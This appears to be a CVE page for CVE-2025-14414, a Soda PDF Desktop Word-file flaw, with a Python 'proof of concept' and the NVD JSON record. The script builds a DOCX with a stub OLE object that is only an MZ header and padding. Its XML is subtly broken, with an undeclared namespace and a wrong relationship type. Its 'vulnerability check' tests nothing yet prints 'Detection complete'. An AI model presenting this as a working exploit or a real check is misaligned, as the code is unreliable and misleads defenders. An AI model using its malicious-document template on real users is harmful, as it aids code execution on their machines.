CVE-2025-14414

# CVE-2025-14414 PoC - Soda PDF Desktop Word File RCE # This PoC demonstrates the insufficient UI warning when processing Word files # with embedded malicious content import zipfile import os from lxml import etree def create_malicious_word_doc(): """ Create a malicious Word document that exploits CVE-2025-14414 The document contains embedded OLE objects that can execute code when processed by Soda PDF Desktop without proper warnings """ # Create a basic DOCX structure docx_path = "malicious_cve_2025_14414.docx" with zipfile.ZipFile(docx_path, 'w', zipfile.ZIP_DEFLATED) as docx: # [Content_Types].xml content_types = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"> <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/> <Default Extension="xml" ContentType="application/xml"/> <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/> <Override PartName="/word/embeddings/oleObject.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/> </Types>''' docx.writestr('[Content_Types].xml', content_types) # _rels/.rels rels = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/> </Relationships>''' docx.writestr('_rels/.rels', rels) # word/_rels/document.xml.rels - embedding reference doc_rels = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="embeddings/oleObject.bin"/> </Relationships>''' os.makedirs('word/_rels', exist_ok=True) docx.writestr('word/_rels/document.xml.rels', doc_rels) # word/document.xml - main document content with embedded object reference document_xml = '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"> <w:body> <w:p> <w:r> <w:rPr><w:b/></w:rPr> <w:t>Document with Embedded Object - CVE-2025-14414</w:t> </w:r> </w:p> <w:p> <w:r> <w:t>This document contains an embedded OLE object that may execute code when processed.</w:t> </w:r> </w:p> <w:p> <w:r> <w:object w:anchor="1"> <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1298632096"> <o:HasRelativeSize/> <o:AspectRatio/> </o:OLEObject> </w:object> </w:r> </w:p> </w:body> </w:document>''' docx.writestr('word/document.xml', document_xml) # Create malicious OLE object os.makedirs('word/embeddings', exist_ok=True) ole_data = b'MZ' + b'\x90' * 58 + b'\x00' * 100 docx.writestr('word/embeddings/oleObject.bin', ole_data) print(f"[+] Created malicious Word document: {docx_path}") print(f"[!] This PoC demonstrates the structure. Actual exploitation requires crafting specific OLE payloads.") return docx_path def verify_vulnerability(product_version=None): """ Verify if the target system is vulnerable to CVE-2025-14414 Check if Soda PDF Desktop processes embedded objects without proper warnings """ print("\n[*] CVE-2025-14414 Vulnerability Check") print("=" * 50) print("Target: Soda PDF Desktop") print("Vulnerability: Insufficient UI Warning during Word file processing") print("CVSS Score: 7.8 (High)") print("Attack Vector: Local (requires user interaction)") print("\n[+] Detection complete - manual verification required") if __name__ == "__main__": create_malicious_word_doc() verify_vulnerability() print("\n[!] Note: This PoC is for educational purposes only.") print("[!] Always obtain proper authorization before testing vulnerabilities.")

{"cve": {"id": "CVE-2025-14414", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:48.267", "lastModified": "2026-01-07T21:21:41.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop Word File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of Word files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27496."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf_desktop:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "1D8EE1AA-FC6C-4164-970C-E9DCE64DA560"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1087/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}